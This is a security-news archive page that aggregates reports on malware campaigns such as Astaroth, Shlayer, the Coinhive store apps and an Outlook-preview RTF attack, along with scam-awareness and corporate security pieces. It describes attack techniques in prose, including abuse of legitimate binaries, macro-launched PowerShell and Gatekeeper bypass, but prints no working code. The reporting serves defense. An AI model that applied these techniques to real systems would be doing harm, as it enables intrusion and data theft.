Category Archives: Malware

Astaroth Trojan relies on legitimate os and antivirus processes to steal data

A new Astaroth Trojan campaign was spotted by the Cybereason’s Nocturnus team, hackers are targeting Brazil and European countries.

Researchers at Cybereason’s Nocturnus team have uncovered a new Astaroth Trojan campaign that is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and drop malicious modules.

“The campaign exploits legitimate operating system processes as well as security vendor products from companies like Avast and GAS Tecnologia to gain information about the target machine and steal password information, as well as keystate information and clipboard usage.” reads the analysis published by Cybereason.

The Astaroth Trojan was first spotted by security firm Cofense in late 2018 when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts, LOLbins are very effecting in evading antivirus software. 

The new stain analyzed by Cybereason leverages the BITSAdmin and the WMIC utilities to connect the command and control infrastructure and download malicious payload. 

The BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.

This Astaroth Trojan is distributed through spam campaigns, malicious messages use a .7zip file as an attachment or include a hyperlink that points to the archive.

The .7zip archive contains a .lnk file which will instantiate a wmic.exe process that will “initialize an XSL Script Processing attack.”

The malware uses the BITSAdmin to fetch a payload from another Command and Control server, this malicious code is obfuscated as images or files without extensions and contains various Astaroth modules.

Astaroth Trojan

The malware also injects a malicious module in the aswrundll.exe Avast Software Runtime Dynamic Link Library used by the Avast antivirus. This code is used to gather information about the compromised system and to load extra modules.

The choice of Avast is effective because the Avast engine is the most common antivirus in the world. Avast pointed out that this is neither injection nor a privilege escalation, attackers are using an Avast file to run a binary in a similar way that a DLL using Windows’ rundll32.exe can run. Avast had issued a detection for the malware and plan to implement changes to their environment to ensure the same process cannot be misused in this way the future.

The Astaroth Trojan sample analyzed by the experts also exploits the unins000.exe process of a security solution developed by GAS Tecnologia.

The malware is able to log the users’ keystrokes, collect information through hooking, access clipboard content, and monitoring the keystate.

The Astaroth Trojan also uses the NetPass free network password recovery tool to collect login passwords of remote computers on the LAN, passwords of mail accounts on an exchange server stored by Microsoft Outlook, and passwords of MSN Messenger and Windows Messenger accounts.

“Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above.” concludes Cybereason.

“LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.”

Pierluigi Paganini

(SecurityAffairs – Astaroth Trojan, hacking)

The post Astaroth Trojan relies on legitimate os and antivirus processes to steal data appeared first on Security Affairs.

What is Ransomware and How to Prevent It?

By Zohar Pinhasi

The threat of ransomware attack is growing but do you know what is ransomware and how you can protect yourself from this growing threat? If you’ve been following the news on malware scams and hacks from across the world, chances are that you might have come across the term ‘ransomware’. It’s deemed as the biggest […]

This is a post from HackRead.com Read the original post: What is Ransomware and How to Prevent It?

Cryptojacking Coinhive Miners for the first time found on the Microsoft Store

Symantec discovered eight potentially unwanted applications (PUAs) into the Microsoft Store that were dropping cryptojacking Coinhive miners.

Security experts at Symantec have discovered eight potentially unwanted applications (PUAs) into the Microsoft Store that were dropping cryptojacking Coinhive miners.

The removed apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

Cryptojacking apps

The malicious Monero (XMR) Coinhive cryptomining scripts were delivered leveraging the Google’s legitimate Google Tag Manager (GTM) library.

The GTM tag management system allows developers to inject JavaScript and HTML content within their apps for tracking and analytics purposes.

“Users may get introduced to these apps through the top free apps lists on the Microsoft Store or through keyword search. The samples we found run on Windows 10, including Windows 10 S Mode.” reads the analysis published by Symantec.

“As soon as the apps are downloaded and launched, they fetch a coin-mining JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. The mining script then gets activated and begins using the majority of the computer’s CPU cycles to mine Monero for the operators.”

The malicious apps were added to the Microsoft Store between April and December 2018.

Unlike Google Play, Microsoft Store doesn’t share information on the number of downloads installed on numerous devices, but experts pointed out that the apps have a large number of fake ratings, there were almost 1,900 ratings posted for these applications.

Once one of the apps is downloaded and launched, it fetches a cryptojacking JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. Then the mining script is activated and starts abusing devices resources to mine Monero cryptocurrency.

After snooping on the network traffic between the apps and their command-and-control servers, Symantec was able to find out that they were using a variant of the JavaScript-based Coinhive miner script, a well-known tool used by threat actors as part of cryptojacking campaigns since September 2017 when it was launched.

The analysis of the network traffic associated with the apps allowed the researchers to find the hosting server for each app. All the servers have the same origin, the apps were likely published by the same developers under different names.

Symantec provided the following recommendations to mitigate the threat:

  • Keep your software up to date.
  • Do not download apps from unfamiliar sites.
  • Only install apps from trusted sources.
  • Pay close attention to the permissions requested by apps.
  • Pay close attention to CPU and memory usage of your computer or device.
  • Install a suitable security app, such as Norton or Symantec Endpoint Protection, to protect your device and data.
  • Make frequent backups of important data.

Pierluigi Paganini

(SecurityAffairs – cryptojacking Coinhive miners, malware)

The post Cryptojacking Coinhive Miners for the first time found on the Microsoft Store appeared first on Security Affairs.

Ransomware in City Hall

Ransomware in City Hall Del Rio

In 2018, the undisputed star in a cybercriminal’s arsenal was cryptojacking. Nevertheless, the use of other kinds of malicious software is still booming in such relevant sectors as public administration. Ransomware is still one of the most popular cyberthreats among criminals, due to how easy it is to implement, how lucrative it can be, and how efficient it is at getting results. And it is already making waves in 2019.

City officials in the city of Del Rio, Texas, reported a ransomware attack at the start of January that affected their systems and forced them to carry out their administrative tasks manually, with pen and paper. Del Rio’s Management Information Services were obliged to disconnect City Hall’s computers to keep employees from accessing the system and spreading the infection.

According to US media outlets, the attack was carried out using an unusual strategy. The ransom note included a phone number to communicate with the attackers and get instructions as to how to pay to recover their files; the usual course of action for attackers in these situations is to provide an email address for the victim to use if they need more information about decrypting their infected devices.

The City has revealed very few technical details about the attack: the ransom demanded by the attacker, the specific strain of ransomware used in the attack, and the person or group responsible for the attack are all unknown.  Nevertheless, along with the cost of recovering their computers, the attack caused a major loss of productivity, and seriously slowed down their workflow.

Other public sector attacks

This is not the first time that a city hall or public administration has been affected by ransomware. In April 2018, the city of Atlanta spent over $2.6 million to recover from a ransomware attack  that paralyzed the city government’s operations. With this budget, the city had to pay for incident response services, digital forensic analysis, Microsoft Cloud experts, and staff to help with systems recovery, as well as crisis communication services.

In July, Matanuska-Susitna, a borough in the state of Alaska was also hit by several types of advanced malware, bringing down their IT infrastructure, affecting computers, servers, and telephones, as well as paralyzing email communication. In this case, the borough was attacked with advanced persistent threats, with strains such as the Trojan Emotet and the ransomware BitPaymer.  Officials in the borough estimated the cost of restoring servers and systems after the attacks to be over $2 million. It is quite clear that this kind of threat has an almost limitless capacity to endanger all sectors, from private companies to public institutions. This is why it is so important to try to avoid these risks and be able to identify threats in a timely manner.

How to make public administration malware-free

Cybersecurity solutions are vital in the fight to keep ransomware out of public sector systems, and it is important to try to implement them before an attack happens. Heads of security also have a duty to ensure that all employees in these institutions understand the risks and the large scale consequences of such apparently harmless actions as opening an email or clicking on a link. This can be done by carrying out awareness programs, and by training employees.

The most relevant tips for preventing a ransomware attack – making backups, updating software and devices – apply to any kind of sector, including public administration. However, measures such as an efficient incident response plan and complementing internal IT services with the experience and support of third parties can reduce the impact caused by cybercriminals, and help professionals in the race against the clock. Advanced cybersecurity solutions such as Adaptive Defense combine prevention, detection and response to the threats posed by malware. With the necessary support, both private companies and public and government institutions can stop cyberattacks from holding their computers to ransom and forcing them to have to go back to the days of pen, paper, and typewriters.

The post Ransomware in City Hall appeared first on Panda Security Mediacenter.

Blog | Avast EN: Windows Malware for Macs and More Weekly News | Avast

Phishing scam has fishy URLs

There’s a phishing campaign afoot that tries scamming users into believing their email accounts have been compromised. The phishing email claims multiple verification errors have caused the users’ accounts to be blacklisted and the only fix is an immediate login with the proper credentials. The email provides a link that reads CONFIRM YOUR EMAIL, and when users click on it, they are taken to a fake login page based on their particular email service. If they enter their credentials, the info is sent back to the malware’s C&C (command-and-control server).



Blog | Avast EN

Astaroth Trojan Exploits Antivirus Software

The Astaroth Trojan steals credentials and other user data through antivirus software, Avast, and services. It sends scam campaigns with

Astaroth Trojan Exploits Antivirus Software on Latest Hacking News.

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email, asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

Experts spotted a new strain of Shlayer macOS Malware

Security experts at Carbon Black have recently discovered a new strain of the Shlayer malware that targets macOS versions.

Security experts at Carbon Black have recently spotted a new strain of the Shlayer malware that targets MacOS versions from 10.10.5 up to 10.14.3.

The malware poses as an Adobe Flash update it was distributed through a large number of websites, fake or compromised legitimate domains.

Shlayer macOS Malware

“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.

“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from malvertisements on legitimate sites.”

This variant of the Shlayer malware employs multiple levels of obfuscation, experts discovered that many of the initial DMGs are signed with a legitimate Apple developer ID.

The malware uses legitimate system applications via bash to conduct all installation activity.

Once the installer is launched, a .command script is executed from a hidden directory in the mounted volume. The script in base64 is decoded and AES decrypted revealing a second script that contains another encoded script that is subsequently executed.

The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using uuidgen, creates a custom URL using the harvested data, and then downloads the second stage payload. 

The malicious script attempts to download the password-protected ZIP file using curl, and creates a directory in /tmp to store the ZIP file and unzip it. 

The script also makes the binary within the unzipped .app executable using chmod +x, then it runs the payload using specific arguments, and then performs a killall Terminal to kill the running script’s terminal window.

The second stage malware attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline

“After the second stage payload is downloaded and executed, it attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline as discussed in Patrick Wardle’s DEFCON 2017 talk “Death by 1000 Installers”.” continues the analysis.

“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be adware in the analyzed samples) and disables Gatekeeper for the downloaded software using spctl.”

With this technique it is possible to run whitelisted software without user intervention even if the system is set to disallow unknown applications downloaded from the internet. 

Carbon Black’s analysis includes Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Shlayer, hacking)

The post Experts spotted a new strain of Shlayer macOS Malware appeared first on Security Affairs.

Google Play Store Malicious App Detection Up By Over 50%

In Google’s mid-year review which was announced on Wednesday, they said that Google Play Store app rejections went up 55%

Google Play Store Malicious App Detection Up By Over 50% on Latest Hacking News.

Hacked versions of popular iOS games available on App Store

By Waqas

Software pirates are distributing hacked and infected versions of iPhone apps by hijacking Apple’s enterprise developer program. Reportedly, the hacked apps include versions of Minecraft, Spotify, Angry Birds, and Pokemon Go. These apps have been modified for making paid content/features available for free to deprive the original developers and Apple of their due revenue share […]

This is a post from HackRead.com Read the original post: Hacked versions of popular iOS games available on App Store

Organizations Continue to Fail at IoT Security, and the Consequences Are Growing

The internet of things (IoT) is taking over the world — or, at least, it seems that way. According to Gartner, we can expect more than 20 billion connected IoT devices by 2020, up from just shy of 9 billion devices in 2017.

Yet as the IoT takes over the world, IoT security remains, well, pitiful. Connected devices emerged as one of the biggest attack vectors of 2018. While organizations are finally recognizing that the IoT is a threat to their overall cybersecurity, they are failing to ensure that the networks and data generated by IoT devices remain protected.

You Can’t Protect What You Can’t See

One reason why the IoT became one of the biggest attack vectors of 2018 was its invisibility on enterprise networks. According to a report from Gemalto, 48 percent of businesses admitted they are unable to detect the devices on their network. However, consumers expect businesses to have a handle on IoT security. It’s become a sort of paradox for businesses: They have to protect what they cannot see on their networks.

At the same time, IoT vendors are failing on their end by not developing devices and software with security built in — nor do they have to because there aren’t security standards for the IoT.

“Consider the operating systems for such appliances,” wrote Nick Ismail for Information Age. “How do you upgrade the OS in a wall-mounted air conditioning unit that’s connected wirelessly? Or a smart light bulb? If you can’t upgrade an operating system, how can you attempt to patch any vulnerabilities?”

That’s why cybercriminals are specifically targeting IoT devices. Their security is weak on the device/software side as well as on the network side because organizations struggle to account for all of their connected devices.

In 2018, favorite targets for threat actors included routers and firewalls. The United States Computer Emergency Readiness Team (US-CERT) put out a warning last spring that attackers were going after network devices, saying that if they can own the router, they’ll also take charge of the traffic. The alert added that a “malicious actor with presence on an organization’s internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts.” Legacy systems or systems that are never updated are low-hanging fruit for the picking.

Attacks Against Connected IoT Devices

Cybercriminals know that IoT connections and devices are easy targets, which is why experts warn that we will see an uptick in the number of specifically targeted attacks in the coming years. For example, a rise in malware that targets the medical industry, and not just medical devices themselves, but all of the IoT devices found in hospitals, such as heating, ventilation and air conditioning (HVAC) systems or wireless printers.

Threat actors are also utilizing ransomware for their IoT-based attacks. Ransomware attacks against the IoT aren’t the same as the attacks against your internal network. With an attack on a computer or server, ransomware is able to lock down your data directly. With the IoT, the data itself is in the cloud and the device can easily be rebooted, which means you won’t need to pay the ransom — that’s a lose-lose for the attacker.

Instead, ransomware attacks against the IoT are timed to hit at a critical moment, acting like a distributed denial-of-service (DDoS) attack. The ransomware will take down the device when it can’t be reset, or it takes over the system itself. For example, a ransomware attack could take over a building’s HVAC system late at night on a holiday weekend, turning the air conditioning on high until the ransom is paid.

We’ve also seen how malware can turn IoT devices into botnets and affect the functionality of other networks and devices. These botnets are expected to evolve unless IoT security improves.

IoT Security Solutions for Vendors and Organizations

IoT security is expected to gain a higher profile in 2019. Security experts predict more attacks against IoT infrastructure, more malware targeted directly at these devices and just more endpoints to defend. This means that 2019 should be the year that everyone, from vendors to organizational security teams, invest in their security approach and solutions.

On the software side, security is primarily in vendors’ hands. With greater emphasis and awareness of DevSecOps, we should expect to see a bigger push to bake security directly into devices. New privacy laws across the U.S. will also force manufacturers to give users greater control; for example, California passed a law to ban default passwords on new devices by 2020 and ensure each device has security measures built in.

On the organizational side, security teams can introduce advanced tools such as nano agents and fog computing, which allow for microsegmentation of individual devices. Fog computing is a layer between the device and the cloud, allowing for real-time monitoring of the devices, especially highly critical ones where a cyber incident could be the difference between life and death. While perhaps further off in the future, nano agents can be embedded directly into individual devices to monitor cyber risk.

The internet of things is taking over the world — and so will cybercriminals if we don’t address the security problems surrounding these devices.

The post Organizations Continue to Fail at IoT Security, and the Consequences Are Growing appeared first on Security Intelligence.

Adventures of Cyber Security Monitoring During 2018 U.S. Midterm Elections

With all the Russian election hacking scandals in the news during and after the 2016 Presidential election, curiosity consumed me to architect and run an experiment to see if I could monitor changes in the threat landscape in either Moscow, Russia or Washington D.C. during the 2018 U.S. midterm elections. I have worked in four […]… Read More

The post Adventures of Cyber Security Monitoring During 2018 U.S. Midterm Elections appeared first on The State of Security.

Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises

Along with Emotet, Trickbot has become one of the most versatile and dangerous pieces of modular malware hitting enterprise environments. Most recently, its creators have added another dangerous module to it, which allows it to extract and exfiltrate credentials from popular remote access software. Trickbot’s evolution Like Emotet, Trickbot started as a pure banking Trojan but was slowly developed through the years and now has many more additional capabilities. It can: Achieve persistence (through scheduled … More

The post Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises appeared first on Help Net Security.

Most wanted malware in January 2019: A new threat speaks up

Check Point’s Global Threat Index for January 2019 reveals a new backdoor Trojan affecting Linux servers, which is distributing the XMRig crypto-miner. The new malware, dubbed SpeakUp, is capable of delivering any payload and executing it on compromised machines. The new Trojan currently evades all security vendors’ anti-virus software. It has been propagated through a series of exploitations based on commands it receives from its control center, including the 8th most popular exploited vulnerability, “Command … More

The post Most wanted malware in January 2019: A new threat speaks up appeared first on Help Net Security.

Bromium: Preview Pain: Malware Triggers in Outlook Preview Without User Opening Word Document

A recent malware sample forwarded to our Threat Intelligence service had some very interesting properties which we think would be useful to share. The sample itself is a Word document which is emailed as part of a phishing attack. If the user interacts with the document, it would download a payload to run on the user’s machine. So far, nothing particularly unusual, this infection route is de rigueur and the Bromium blog contains many recent examples, including my write-up on an Emotet campaign and Mathew Rowen’s excellent post.

There are three reasons why this specific sample is somewhat unusual. Firstly, the user does not have to open the document for the malware to trigger. Secondly, it still works if the file is marked with an ADS security Zone identifier of 3 (meaning the file is known to come from an untrustworthy location). And finally, it successfully avoids having the payload it downloads scanned by some AV APIs. In this blog I intend to cover the first two issues, and there will be a follow-up post in a few days to cover the final part of the attack.

For those that wish to dig a little deeper, the hash for the malicious document is:

  • 3FEA120D39B1F0B63DC6A73D0EE2D197169FC765DD5B1EAFC5658C6799D4B00F

How do you get infected without opening the document?

Short answer is—document preview! When you highlight a document in Windows Explorer or Outlook, there is a Preview pane on the right-hand side (or below, depending on your preferences) that gives you a small image of what the document looks like. This is a convenient usability feature, but it has issues from a security perspective—in order to create the image, the content of the document needs to be parsed. Microsoft has generally done a good job of securing this. For example, all the macros will be switched off, and we rarely see attacks that are triggered in the preview.

PowerShell is executing inside the Explorer Preview pane

This attack triggered when the document is highlighted and opened in the Windows Explorer Preview on my corporate laptop (yes, I run malware on my work laptop, but it’s safely isolated within a uVM). Since macro support in the preview is disabled, it leads us to the conclusion that this attack is not using a macro within Word itself, which is indeed unusual. From the above image, you can notice that PowerShell is executing inside the Explorer Preview pane, which is not something we see often.

This same executable is used for the preview of attachments in Outlook, and it results in the same behaviour. If Outlook loads the attachment in the Office Preview, the attack will run. The user never needs to open the attachment directly.

How did the bad guys manage that?

Bromium-Preview-Pain-Word-Malware

As expected, the document does not contain a macro, but instead, it makes use of a feature of RTF document format that allows the embedding of Excel using “\objupdate” to force an update. It contains five embedded Excel workbooks in the footer, each holding some base64 encoded text in cell G135 (See image above). The embedded workbook itself does contain a macro that runs on opening of Excel, which in turn reads the content of cell G135 and converts that text into the script to run in PowerShell. This results in a child Excel instance that isn’t running in the same security state as the preview process that launched it, which in turn gives the attacker the ability to launch PowerShell.

Without Bromium Secure Platform installed on my machine, my experience would have been a little different, since the various spawned processes of the malware would not be contained in the VM, allowing them to be seen more easily. The difference in user experience is that once the Office Preview loads the Word document, an Excel workbook would unexpectedly open on the machine in the foreground. This looks to be an oversight in the document preview code in Microsoft Office, as it is neither a good user experience, nor a desirable behaviour from a security point of view.

Mark of the web

When you use your web browser or your Outlook client to download a file, there is some clever code which looks at the location (such as the domain the file came from) to see if it originated inside the enterprise or from some unknown place. If it originated outside the enterprise, an ADS zone identifier is applied to the file, which allows other processes to recognize that there is an increased risk of using this file and behave differently. From this point forward, I will refer to this as “mark of the web”.

The standard use of “mark of the web” is to disable macros in Office documents, should they come from an untrusted location, which is referred to as Office Protected View. This is a powerful security feature because it forces malware authors to have some social engineering in the document to get the user to take it out of the protected view to allow the malware to run. Users who are familiar with security protocols are significantly less likely to fall for such social engineering, and thus are more protected, even if the document is opened. I was surprised to see that there was no attempt at social engineering on this document, even though in my experience, most other documents are taking that route. We tested out what happens if the file has the “mark of the web” applied to it. Maybe no social engineering effort has been made because none is needed?

The behaviour in the test was interesting: if I opened the document after the “mark of the web” was applied, the malware would no longer execute, since the method used to launch Excel no longer worked. So far, it behaves as expected, and this outcome is desirable. However, even with the “mark of the web” applied to the file, the Office Preview-mode attack still worked, so it seems that the Office Preview process is not respecting this security feature. I speculate that since macros are disabled in the preview anyway, no one considered the need to look whether the “mark of the web” is set on the file. This would be reasonable if it wasn’t for the issue where the preview would allow Excel to be invoked from an RTF document.

How dangerous is this?

The severity of the attack may vary depending on security stack and configuration. If you have Bromium Secure Platform installed, then the preview is running isolated within a virtual machine (we have done this for the last six years), so there is no risk.

Microsoft has also done good things to help – if the Office installation is in the default configuration, there is a prompt displayed to the user before any macro can run in Excel by way of a modal dialog indicating that the document might not be trustworthy. This feature could prevent this attack from getting as far as the payload without at least some user interaction. Unfortunately, this specific configuration is often switched off since it leads to usability issues, where legitimate Excel workbooks always display the prompt, annoying users. Even if the dialog does appear, there’s no guarantee that the user will not click on it by mistake. If a user works with a lot of Excel documents and has many of them open at any given time, they may not realise a particular Excel instance is unexpected. It is possible they may just allow the macro to run anyway since they might be used to having to clear a warning dialog when working with legitimate files.

Finally, there’s a concern that although this attack required a macro in Excel to run, which could be prevented by paying attention to the prompt, it is fair to say that Excel is a complex program and it is entirely possible that a future sample would be able to come up with a smarter way to infect the host.

Since the attack also works with the preview mode in Outlook, the risk of infection increases, the user does not need to save the file to disk so that it could be run by the Explorer Preview. Just clicking on the attachment in Outlook with previews enabled would be enough for the attack to work.

Bromium considers this attack to have a significantly higher chance of success than other attack methods that we traditionally see in Office documents. With the reduction in social engineering required for the attack to be successful, even well-trained users will be at risk of infection.

Mitigation:

We recommend that machines without Bromium installed have the Office Preview feature disabled. Doing so will reduce the risk to a similar level to other Office malware varieties that we see in the wild.

If you want to know more about this malware, look out for a follow-up post in a few days.

The post Preview Pain: Malware Triggers in Outlook Preview Without User Opening Word Document appeared first on Bromium.



Bromium

Cybersecurity Leaders From Maersk and Westfield Insurance Discuss Digital Transformation at Major Industry Event

In June 2017, the cybersecurity world changed. As soon as NotPetya began infecting systems in Ukraine and spreading across Europe and beyond, it became clear that the intent of this worm wasn’t espionage, distributing malware or holding data for ransom. Rather, it was designed to destroy data, shut down systems and create havoc.

One of the most severely impacted organizations was global shipping giant Maersk, which transports 20 percent of the world’s trade goods. When Maersk’s systems went down, it sent shockwaves around the world and caused security observers to shudder. NotPetya was apparently a cyberweapon launched against Ukraine, but a far greater number of countries and organizations became collateral damage.

It was a wake-up call for Maersk, according to Andy Powell, who joined the company as its new chief information security officer (CISO) in June 2018, a year after the NotPetya attack.

“What Maersk was very strong at was our ability to recover,” Powell said in a fireside chat with IBM Security General Manager Mary O’Brien on Tuesday, the opening night of the 2019 IBM Think conference. “Balancing business resilience with preventative measures means that any company can address some of these high-end attacks, but you’ve got to accept that some of them are going to get through. And therefore, you need to be able to recover your business.”

While cybersecurity inevitably changed in the wake of NotPetya, it’s continuing a rapid transformation as businesses digitize and create ever more data. O’Brien and Powell discussed these profound shifts during their chat, along with Kevin Baker, CISO of Westfield Insurance, who underscored the impacts of digital transformation on data security, risk and compliance.

Watch the video from Think 2019

Lessons in Resiliency and Agile Security

In the age of cloud and connected everything, the volume of data being produced has exploded, along with opportunities for greater insights, innovation and new business models. This digital transformation has broad implications for security.

“Our clients want to know where their containers are, they want to know what part of the process is involved, they want to know information around what they’re moving,” Powell said. “We can provide that as part of the transformation.”

To secure digital innovation for clients, alongside its legacy systems, Maersk’s security team has taken an agile approach. Security is frequently seen as a roadblock to innovation, Powell said. Bringing together project teams and the security organization helps speed innovations to market by building security into the process from the beginning.

“The reality is the security people need to be working with them in those teams to actually integrate security from day one, and that’s starting to really pay off, because we’re no longer seen as the outsiders,” Powell said. “We’re seen as somebody who is prepared to adopt the culture and work with them. That teamed approach is very important.”

Focus on Data Security, Risk and Compliance

Ohio-based Westfield Insurance, with $4.9 billion in assets, has been in business since 1848. That means “a lot of data,” Baker said during the Think fireside chat.

“Because of digitization, it’s a veritable explosion of data. Our job is to know what data we have, where it is, how many copies of it we have, where it’s moving, who can access it and what the criticality of that data is so we can focus on data that has a regulatory import,” Baker said.

Baker’s team focuses on governance and risk, monitoring existing regulations like the New York Department of Financial Services (NYDFS) cybersecurity regulation. And they look to the horizon for emerging compliance risks, such as California’s data privacy law, which will take effect in January 2020.

The California Consumer Privacy Act (CCPA) follows in the footsteps of the European Union (EU)’s General Data Protection Regulation (GDPR) with strict data privacy mandates, including a “right to be forgotten,” whereby companies will be required to destroy certain types of customer data.

“‘Forget me’ is a new capability that we have to solve for,” Baker said. “So we’re looking for ways that we can tag the data, move the security control down at the data element, and use the same tagging and process in multiple ways. It’s more than data classification, but it starts there.”

How Can Digital Transformation Help Reduce Complexity?

Digital transformation in business — through the adoption of technologies such as the cloud, artificial intelligence, and mobile and smart devices — has had major implications for the security industry as well. Although security products have made strides in protecting businesses beyond the traditional firewall, complexity is a hidden cost of innovation.

“We believe the No. 1 challenge is the complexity that we — the vendors and our clients — have jointly created,” O’Brien said during her chat at the IBM Think conference, her first as IBM Security general manager. “We got here because we let the latest threat of the day or requirement drive our technology and our strategy. So every time there was a new attack, a new merger, a new regulation, we created a new tool.”

The second problem of security innovation, O’Brien added, is that these products are created, purchased and deployed in silos. They are not integrated and don’t naturally talk to each other. According to O’Brien, it’s time to eliminate this complexity to enable business innovation and transformation.

This past October, IBM Security launched IBM Security Connect, a simple, open and connected cloud platform that can automatically access security data no matter where it resides. This enables security teams to take advantage of existing investments, from IBM or other vendors, without compromising effectiveness.

“You have insights today, but not total insights,” O’Brien said. “But because Connect can tap into your existing data wherever it is, you will see the full picture of your security situation without having to migrate your data or manually integrate it.”

For his part, Baker said limiting the number of tools but integrating them across multiple vendor systems is key to making strides toward his team’s data security goals.

“We elected to use not more security tools, but fewer security tools. We chose tools that were on their own pretty powerful, things like IBM’s QRadar and Guardium. Then we integrated that with other vendors,” Baker explained. “We use these tools to create our own link and do our own analysis. Not just the net-new data, but even the legacy data, and then to analyze that data as a single unit, to track the most critical data. We know that we can’t track it all. We need to zero in on what’s important.”

The post Cybersecurity Leaders From Maersk and Westfield Insurance Discuss Digital Transformation at Major Industry Event appeared first on Security Intelligence.

Malicious Windows EXE Files Infect macOS Users With Infostealers and Adware

Security researchers discovered several Microsoft Windows EXE files using malicious payloads to infect macOS users with infostealers and adware.

Trend Micro found one adware-bearing sample hiding within an installer for the Windows and Mac firewall app Little Snitch, which is available for download from various torrent websites. The sample was able to bypass Mac’s Gatekeeper, since this built-in protection mechanism doesn’t conduct code signature checks for or otherwise verify EXE files on machines running macOS.

Contained within the ZIP file downloaded from the torrent websites is a DMG file that hosts the Little Snitch installer. This installer hides an EXE file that loads an infostealer. The malware then gathers basic system information, such as Memory, BootROMVersion and SMCVersion, and scans the /Application directory for installed apps, such as App Store, FaceTime and Mail. After completing these steps, the malware sends all its findings to its command-and-control (C&C) server.

Additionally, the executable is capable of downloading several files from the internet. These files, in turn, download adware and other potentially unwanted applications.

Bridging Windows and macOS With Malware

